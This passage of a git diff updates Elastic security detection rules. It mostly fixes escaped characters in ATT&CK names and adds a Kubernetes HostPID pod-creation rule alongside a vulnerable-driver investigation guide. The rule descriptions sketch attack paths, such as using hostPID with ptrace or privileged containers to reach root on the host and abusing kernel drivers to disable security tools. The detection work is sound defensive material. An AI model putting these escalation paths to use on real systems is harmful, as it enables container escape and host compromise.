identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n", "references": [ "https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks" @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_101.json b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_101.json index 28b49af299c..8647a2e3782 100644 --- a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_101.json +++ b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_102.json b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_102.json index 09f16ce1c87..9c9c4e34a47 100644 --- a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_103.json b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_103.json index 4f562cf5f0b..58d12ffd1a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_101.json b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_101.json index 26fe78ca883..9e406b2ddd9 100644 --- a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_101.json +++ b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_102.json b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_102.json index 97949cb1ee4..e314a840017 100644 --- a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_102.json +++ b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_102.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_102.json index d6a7dd62dfc..ead1f8a6475 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_102.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_103.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_103.json index b3b9e3090bf..55d5e90caac 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_103.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_104.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_104.json index 53cb42da4c8..76c5cbdd6af 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_104.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_105.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_105.json index d1b8bf41cb0..22c52f5f0ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_105.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_106.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_106.json index 51656766ff0..7022639c16f 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_106.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_201.json b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_201.json index 544dc8f1379..65dc2f8541e 100644 --- a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_201.json +++ b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_201.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_202.json b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_202.json index 08d9da0e2be..0741e95b255 100644 --- a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_202.json +++ b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_202.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_203.json b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_203.json new file mode 100644 index 00000000000..e496d3777ff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_203.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects an attempt to create or modify a pod attached to the host PID namespace. HostPID allows a pod to access all the processes running on the host and could allow an attacker to take malicious action. When paired with ptrace this can be used to escalate privileges outside of the container. When paired with a privileged container, the pod can see all of the processes on the host. An attacker can enter the init system (PID 1) on the host. From there, they could execute a shell and continue to escalate privileges to root.", + "false_positives": [ + "An administrator or developer may want to use a pod that runs as root and shares the hosts IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective. Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\"" + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Pod Created With HostPID", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.hostPID:true\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n", + "references": [ + "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", + "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces", + "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.image", + "type": "text" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.hostPID", + "type": "boolean" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "df7fda76-c92b-4943-bc68-04460a5ea5ba", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1610", + "name": "Deploy Container", + "reference": "https://attack.mitre.org/techniques/T1610/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "df7fda76-c92b-4943-bc68-04460a5ea5ba_203", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e00b8d49-632f-4dc6-94a5-76153a481915_1.json b/packages/security_detection_engine/kibana/security_rule/e00b8d49-632f-4dc6-94a5-76153a481915_1.json index 7741293124f..c4ba62eb079 100644 --- a/packages/security_detection_engine/kibana/security_rule/e00b8d49-632f-4dc6-94a5-76153a481915_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e00b8d49-632f-4dc6-94a5-76153a481915_1.json @@ -105,7 +105,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -132,7 +132,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_101.json b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_101.json index 71053fb9e0a..672887addf3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_101.json +++ b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_102.json b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_102.json index 416b68325ef..2e7f96ba6d7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_103.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_103.json index 68732b650e6..68ebcf59871 100644 --- a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_103.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_104.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_104.json index 4ec961c185c..23bb31683be 100644 --- a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_104.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_105.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_105.json index 220ff3acec4..996b1db0a5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_105.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_106.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_106.json index ae35aa7a583..fbfd10931e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_106.json @@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", - "setup": "\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```\n", + "setup": "\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_2.json b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_2.json index 50bcb45a0b7..8d26aa4a25b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_2.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_3.json b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_3.json index 1644d2d81d9..4fe007ce720 100644 --- a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_3.json +++ b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_3.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": 